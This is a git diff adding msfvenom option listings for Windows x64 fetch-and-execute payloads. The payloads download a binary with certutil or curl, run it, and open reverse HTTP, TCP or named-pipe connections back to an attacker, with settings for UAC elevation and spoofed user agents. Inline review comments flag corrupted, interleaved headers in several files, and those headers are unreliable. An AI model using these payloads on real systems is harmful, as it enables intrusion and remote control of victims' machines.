no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_https.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_https.txt new file mode 100644 index 0000000..b172d0e --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_https.txt 
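Review bot: the header of cmd-windows-http-x64-custom-reverse_http.txt is corrupted and should be regenerated before merging: after "Arch:" the text runs straight into "Evasion options for payload/cmd/windows/http/x64/custom/reverse_http:" and a bare "=========================", the Needs Admin, Total size and Rank fields present in the other files are missing, and the "Provided by" list starts mid-name with "atters-r7". This looks like the evasion-options listing was interleaved with the module info output when the file was captured.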
@@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet) + Module: payload/cmd/windows/http/x64/custom/reverse_https + Platform: Windows + Arch: +Evasion options for payload/cmd/windows/http/x64/custom/reverse_https: +========================= + +ters-r7 + hdm + agix + rwincey + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME JwRhtGwNOK no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. 
+ + Tunnel communication over HTTP (Windows x64 wininet) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_named_pipe.txt new file mode 100644 index 0000000..8b668b8 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_named_pipe.txt 
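Review bot: cmd-windows-http-x64-custom-reverse_https.txt has the same capture corruption as the reverse_http file in this change: "Arch:" is followed by "Evasion options for payload/cmd/windows/http/x64/custom/reverse_https:" and a bare "=========================", the Needs Admin, Total size and Rank lines are missing, and the "Provided by" list begins mid-name with "ters-r7". Regenerate the file so its header matches the bind_tcp and reverse_tcp files.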
@@ -0,0 +1,76 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager + Module: payload/cmd/windows/http/x64/custom/reverse_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME ylcErYfJjgDF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +PIPEHOST . yes Host of the pipe to connect to +PIPENAME msf-pipe yes Name of the pipe to listen on +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. 
+ + Connect back to the attacker via a named pipe pivot + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run 
shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp.txt new file mode 100644 index 0000000..8f92d1c --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp.txt 
@@ -0,0 +1,83 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager + Module: payload/cmd/windows/http/x64/custom/reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME qcgJPGEy no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Connect back to the attacker (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. 
+ EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp_rc4.txt new file mode 100644 index 0000000..c31284d --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp_rc4.txt 
@@ -0,0 +1,89 @@ + + Name: HTTP Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/custom/reverse_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + hdm + skape + sf + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME iTsegxNFX no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. 
+ + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + 
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp_uuid.txt new file mode 100644 index 0000000..d3e4984 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp_uuid.txt 
@@ -0,0 +1,84 @@ + + Name: HTTP Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/custom/reverse_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME dNzMwmbu no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. 
+ + Connect back to the attacker with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn 
and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_winhttp.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_winhttp.txt new file mode 100644 index 0000000..d4795ae --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_winhttp.txt 
@@ -0,0 +1,98 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp) + Module: payload/cmd/windows/http/x64/custom/reverse_winhttp + Platform: Windows + Arch: cm +Evasion options for payload/cmd/windows/http/x64/custom/reverse_winhttp: +========================= + +-r7 + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME xZFkDyIq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. 
+ + Tunnel communication over HTTP (Windows x64 winhttp) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyIE true no Enable use of IE proxy settings + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_winhttps.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_winhttps.txt new file mode 100644 index 0000000..0111914 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_winhttps.txt 
@@ -0,0 +1,101 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp) + Module: payload/cmd/windows/http/x64/custom/reverse_winhttps + Platform: Windows + Arch: cm +Evasion options for payload/cmd/windows/http/x64/custom/reverse_winhttps: +========================= + +r7 + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME HFdHiOGjV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. 
